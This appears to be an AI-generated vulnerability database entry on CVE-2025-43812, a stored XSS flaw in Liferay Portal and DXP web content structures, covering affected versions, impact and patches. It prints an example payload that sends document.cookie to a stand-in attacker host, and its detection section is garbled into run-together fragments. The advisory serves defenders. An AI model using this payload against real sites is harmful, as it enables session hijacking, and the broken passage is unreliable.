
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-43812 is a stored Cross-Site Scripting (XSS) vulnerability in the web content template component of Liferay Portal and Liferay DXP. It allows remote authenticated users with low privileges to inject arbitrary web script or HTML via a crafted payload in a web content structure's Name text field. Affected versions include Liferay Portal 7.4.3.4 through 7.4.3.111, Liferay DXP 2023.Q4.0 through 2023.Q4.4, 2023.Q3.1 through 2023.Q3.8, and DXP 7.4 GA through update 92. The vulnerability was published on September 29, 2025, with a CVSS v3.1 score of 5.4 (Medium) and a CVSS v4.0 score of 4.8 (Medium) (GitHub Advisory, Liferay Advisory).
The root cause is improper neutralization of user-controllable input before it is rendered in a web page (CWE-79), specifically within the web content template functionality of Liferay's Journal Web module (com.liferay.journal.web). An authenticated attacker with low-level privileges can craft a malicious payload and inject it into the Name text field of a web content structure; this input is not properly sanitized before being rendered in the web content template, causing the script to execute in the browsers of other users who view the affected content. The attack vector is network-based, requires low privileges, and necessitates user interaction (a victim must view the injected content) for the payload to execute (GitHub Advisory, Liferay Advisory). A fix commit is publicly referenced at liferay/liferay-portal@7466c9b (GitHub Advisory).
Successful exploitation allows an attacker to inject and execute malicious scripts in the browsers of other authenticated users who view the compromised web content, impacting both confidentiality and integrity. Potential consequences include session cookie theft, credential harvesting, performing unauthorized actions on behalf of victims, and manipulation of web page content and user experience. Availability is not directly impacted, but the scope is changed — meaning the injected script can affect systems beyond the vulnerable component itself, including subsequent systems accessed by the victim (GitHub Advisory, Liferay Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the structure's Name text field./group/*/~/control_panel/manage?p_p_id=com_liferay_journal_web_portlet_JournalPortlet) containing HTML or JavaScript tags in the name parameter field.<script> elements, or JavaScript event handlers (e.g., onerror, onload).Liferay has released patched versions addressing this vulnerability: Liferay Portal 7.4.3.112-ga112 and com.liferay.journal.web version 5.0.161 or later (GitHub Advisory). For Liferay DXP, users should upgrade to 2023.Q4.5 or later, 2023.Q3.9 or later, or DXP 7.4 update 93 or later (Liferay Advisory). As interim mitigations, administrators should restrict web content structure editing permissions to trusted users only, implement a strict Content Security Policy (CSP) to limit script execution, and monitor audit logs for suspicious content modifications.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."